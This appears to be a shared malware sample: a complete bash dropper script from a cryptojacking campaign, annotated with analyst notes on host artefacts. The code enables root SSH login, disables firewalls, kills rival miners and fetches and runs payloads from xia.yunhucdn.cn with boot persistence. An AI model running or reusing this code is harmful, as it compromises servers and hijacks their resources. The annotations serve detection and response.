
@kerus1024
Created August 28, 2020 13:27
A script that gets installed on the server if you don't care about SSH security.
#!/bin/bash
# Analyst note: the next line is a SysV init header. `chkconfig --add` reads it
# to register the script for runlevels 2,3,4,5 with start priority 88 and stop
# priority 14, so the file is written to be installed under /etc/init.d.
#chkconfig: 2345 88 14
# SHELL and PATH are pinned below so the script finds its tools even when it is
# started from init or cron with a minimal environment.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# kills: weakens the host's network/SSH configuration and terminates a long
# list of named processes and files. Takes no arguments and checks no return
# codes. Every step assumes root privileges (writes to /etc, iptables, kill).
#
# Host artefacts a responder can check for, all taken from the lines below:
#   - /etc/resolv.conf reduced to a single "nameserver 8.8.8.8" entry
#   - "PermitRootLogin yes" as the last line of /etc/ssh/sshd_config
#   - iptables ACCEPT rules for TCP 1522, 3307 and 6001 at the top of INPUT
#   - iptables / SuSEfirewall2 / firewalld stopped, firewalld disabled
#   - sysv-rc-conf installed via apt-get on Debian-family hosts
function kills() {
# Disabled code: would have killed every process above 20% CPU (ps aux column 3)
# other than lines matching "sourplum".
#ps aux |grep -v sourplum | awk '{if($3>20.0) print $2}' | while read procid
#do
#pkill -f $procid
#done
# Replace the resolver configuration: drop every line matching "nameserver" and
# append 8.8.8.8, which bypasses any internal or filtering DNS server.
sed -i '/nameserver*/d' /etc/resolv.conf
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
# needreset is assigned here but not read anywhere in the visible script.
needreset=1;
# Open inbound TCP 1522, 3307 and 6001 by inserting rules at the head of INPUT.
iptables -I INPUT -p TCP --dport 1522 -j ACCEPT
iptables -I INPUT -p TCP --dport 3307 -j ACCEPT
iptables -I INPUT -p TCP --dport 6001 -j ACCEPT
# Remove every PermitRootLogin line (commented or not) and append an explicit
# "yes". Nothing visible here reloads sshd, so the change applies at the next
# sshd restart or reload.
sed -i '/.PermitRootLogin*/d' /etc/ssh/sshd_config
sed -i '/PermitRootLogin*/d' /etc/ssh/sshd_config
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
# Turn off the host firewall through every mechanism the author knew of; the
# commands that do not exist on a given distribution simply fail.
/etc/init.d/iptables stop
service iptables stop
# NOTE(review): the next line looks like two commands fused together
# (presumably "SuSEfirewall2 stop" and "reSuSEfirewall2 stop"); as written it
# names a command that is unlikely to exist.
sUsEFirewall2 stopresUsEFirewall2 stop
systemctl stop firewalld.service
systemctl disable firewalld.service
# Process and file clean-up. `pkill -f` matches against the full command line,
# so short patterns such as "conns" or "i586" hit any process whose arguments
# contain that text. Several names are mining-related terms (cryptonight,
# stratum, minerd, minergate, minexmr), so the list presumably targets competing
# miners; polkitd, acpid and irqbalance are names of legitimate system daemons
# and are killed as well.
pkill -f sourplum
# The && chain stops at the first command that fails; the unquoted ddg* is
# expanded by the shell against the current directory before pkill sees it.
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
pkill -f AnXqV.yam
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f my.confe
pkill -f pprt
pkill -f ppol
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
# SIGKILL every process holding a TCP socket on port 9999, 5555, 7777 or 14444.
# `lsof -i tcp:PORT` matches the port on either end of a connection, so
# outbound connections to those ports are caught too. Presumably these are
# ports used by other miners; confirm against network logs.
PORT_NUMBER=9999
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=5555
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=7777
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=14444
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
# Installs the SysV runlevel tool that downloadyam2 later checks for.
apt-get install -y sysv-rc-conf
}
# check: fetches an archive over unauthenticated HTTP, unpacks it under /etc,
# runs the extracted /etc/ssh/notepad++ in the background and then deletes it
# from disk. The call to this function in the main loop is commented out, so it
# is dead code in this copy of the script.
#
# Artefacts to look for: /etc/ssh.tar, /etc/ssh/notepad++, mode 0777 on
# /etc/rc.local, an "/etc/ssh/notepad++" line in /etc/rc.local, and a running
# process whose executable is shown as deleted.
function check() {
# yum present: treated as a Red Hat family host.
if [ -f "/usr/bin/yum" ];then
# The same download is attempted up to four times, alternating curl and wget,
# each guarded by "binary not present yet". The URL ends in .sh but the result
# is unpacked with tar -z, so it is presumably a gzip tarball. The payload is
# fetched over plain HTTP and no checksum or signature is checked.
if [ ! -f "/etc/ssh/notepad++" ]; then
curl http://xia.yunhucdn.cn/cent.sh -o /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
fi
if [ ! -f "/etc/ssh/notepad++" ]; then
wget http://xia.yunhucdn.cn/cent.sh -O /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
fi
if [ ! -f "/etc/ssh/notepad++" ]; then
curl http://xia.yunhucdn.cn/cent.sh -o /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
fi
if [ ! -f "/etc/ssh/notepad++" ]; then
wget http://xia.yunhucdn.cn/cent.sh -O /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
fi
fi
# Disabled earlier variant that used /etc/my.conf/notepad++ as the payload path.
#nohup /etc/my.conf/notepad++ >/dev/null 2>&1 &
#sed -i '13a\/etc/my.conf/notepad++\n' /etc/rc.local
# Makes the boot script world-writable, so any local user can then edit it.
chmod 0777 /etc/rc.local
# sysv-rc-conf absent: install it with apt-get, then repeat the same download
# sequence as above.
if [ ! -f "/usr/bin/sysv-rc-conf" ];then
apt-get install -y sysv-rc-conf
if [ ! -f "/etc/ssh/notepad++" ]; then
curl http://xia.yunhucdn.cn/cent.sh -o /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
fi
if [ ! -f "/etc/ssh/notepad++" ]; then
wget http://xia.yunhucdn.cn/cent.sh -O /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
fi
if [ ! -f "/etc/ssh/notepad++" ]; then
curl http://xia.yunhucdn.cn/cent.sh -o /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
fi
if [ ! -f "/etc/ssh/notepad++" ]; then
wget http://xia.yunhucdn.cn/cent.sh -O /etc/ssh.tar && cd /etc && tar -zxvf /etc/ssh.tar && chmod 0777 /etc/ssh/notepad++
fi
fi
# Start the payload detached with output discarded, then unlink it. The process
# keeps running from the deleted inode, so a file scan of /etc/ssh finds
# nothing while the process is still alive.
nohup /etc/ssh/notepad++ >/dev/null 2>&1 &
rm -rf /etc/ssh/notepad++
# Appends a launch entry after line 13 of /etc/rc.local. It points at the path
# that was just removed above.
sed -i '13a\/etc/ssh/notepad++\n' /etc/rc.local
}
# downloadyam: keeps a payload present and running at /etc/my.conf, a path
# chosen to look like a configuration file. Called on every pass of the main
# loop.
#
# Artefacts to look for: an executable regular file /etc/my.conf with mode
# 0777, a process whose command line contains "my.conf", and nohup.out in the
# working directory from the first launch.
function downloadyam() {
# File missing: download it. The payload comes over plain HTTP with no
# integrity check, and mode 0777 lets any local user replace it.
if [ ! -f "/etc/my.conf" ]; then
curl http://xia.yunhucdn.cn/my.sh -o /etc/my.conf && chmod 0777 /etc/my.conf
# Retries alternate wget and curl and run only while the file is still absent.
# The rm removes numbered duplicates (my.conf.1, ...) left by repeated fetches.
if [ ! -f "/etc/my.conf" ]; then
wget http://xia.yunhucdn.cn/my.sh -O /etc/my.conf && chmod 0777 /etc/my.conf
rm -rf /etc/my.conf.*
fi
if [ ! -f "/etc/my.conf" ]; then
curl http://xia.yunhucdn.cn/my.sh -o /etc/my.conf && chmod 0777 /etc/my.conf
rm -rf /etc/my.conf.*
fi
if [ ! -f "/etc/my.conf" ]; then
wget http://xia.yunhucdn.cn/my.sh -O /etc/my.conf && chmod 0777 /etc/my.conf
rm -rf /etc/my.conf.*
fi
#sed -i '1a\nameserver 8.8.8.8\n' /etc/resolv.conf
# First launch after download; output is not redirected here.
nohup /etc/my.conf &
else
# File already present: count process-list lines containing "my.conf" and
# relaunch only when none are found.
p=$(ps aux | grep my.conf | grep -v grep | wc -l)
if [ ${p} -eq 1 ];then
echo "my.conf"
elif [ ${p} -eq 0 ];then
# NOTE(review): the meaning of "-P my.conf" depends on the payload, which is
# not shown on this page.
nohup /etc/my.conf -P my.conf>/dev/null 2>&1 &
else
echo ""
fi
fi
}
# downloadyam1: same download-and-keep-alive logic as downloadyam, for a second
# payload stored at /var/ssh.conf. Called on every pass of the main loop.
#
# Artefacts to look for: an executable regular file /var/ssh.conf with mode
# 0777 and a process whose command line contains "ssh.conf".
function downloadyam1() {
# File missing: download over plain HTTP (no integrity check) and mark it
# executable and writable by everyone.
if [ ! -f "/var/ssh.conf" ]; then
curl http://xia.yunhucdn.cn/sso.sh -o /var/ssh.conf && chmod 0777 /var/ssh.conf
# Retries alternate wget and curl and run only while the file is still absent.
if [ ! -f "/var/ssh.conf" ]; then
wget http://xia.yunhucdn.cn/sso.sh -O /var/ssh.conf && chmod 0777 /var/ssh.conf
rm -rf /var/ssh.conf.*
fi
if [ ! -f "/var/ssh.conf" ]; then
curl http://xia.yunhucdn.cn/sso.sh -o /var/ssh.conf && chmod 0777 /var/ssh.conf
rm -rf /var/ssh.conf.*
fi
if [ ! -f "/var/ssh.conf" ]; then
wget http://xia.yunhucdn.cn/sso.sh -O /var/ssh.conf && chmod 0777 /var/ssh.conf
rm -rf /var/ssh.conf.*
fi
# First launch after download; output is not redirected here.
nohup /var/ssh.conf &
else
# File already present: relaunch only when no process line mentions "ssh.conf".
p=$(ps aux | grep ssh.conf | grep -v grep | wc -l)
if [ ${p} -eq 1 ];then
echo "ssh.conf"
elif [ ${p} -eq 0 ];then
# NOTE(review): the meaning of "-P ssh.conf" depends on the payload, which is
# not shown on this page.
nohup /var/ssh.conf -P ssh.conf>/dev/null 2>&1 &
else
echo ""
fi
fi
}
# downloadyam2: installs boot persistence by placing a downloaded script at
# /etc/init.d/S67 and registering it as a SysV service. The main loop visible
# on this page never calls it.
#
# Artefacts to look for: /etc/init.d/S67 with mode 0777, rc?.d symlinks for
# S67, and S67 listed by `chkconfig --list` or sysv-rc-conf.
function downloadyam2() {
# Up to four download attempts, alternating curl and wget, each guarded by
# "file not present yet". The remote name is s68.sh while the local name is
# S67. The fetch is plain HTTP with no integrity check.
if [ ! -f "/etc/init.d/S67" ]; then
curl http://xia.yunhucdn.cn/s68.sh -o /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
rm -rf /etc/init.d/S67.*
fi
if [ ! -f "/etc/init.d/S67" ]; then
wget http://xia.yunhucdn.cn/s68.sh -O /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
rm -rf /etc/init.d/S67.*
fi
if [ ! -f "/etc/init.d/S67" ]; then
curl http://xia.yunhucdn.cn/s68.sh -o /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
rm -rf /etc/init.d/S67.*
fi
if [ ! -f "/etc/init.d/S67" ]; then
wget http://xia.yunhucdn.cn/s68.sh -O /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
rm -rf /etc/init.d/S67.*
fi
# Red Hat family (yum present): register and enable through chkconfig.
if [ -f "/usr/bin/yum" ]; then
chkconfig --add S67
chkconfig S67 on
fi
# Debian family (sysv-rc-conf present, installed by kills): enable there.
if [ -f "/usr/bin/sysv-rc-conf" ]; then
cd /etc/init.d/
sysv-rc-conf S67 on
fi
}
# Main loop: never exits, since `[ 1 ]` tests a non-empty string and is always
# true. Each pass reapplies the configuration changes and process kills, then
# checks both payloads, so any manual clean-up is undone within about ten
# minutes unless this script's own process is stopped first. check is
# commented out and downloadyam2 is not called from here.
while [ 1 ]
do
kills
#check
downloadyam
sleep 20
downloadyam1
sleep 600
done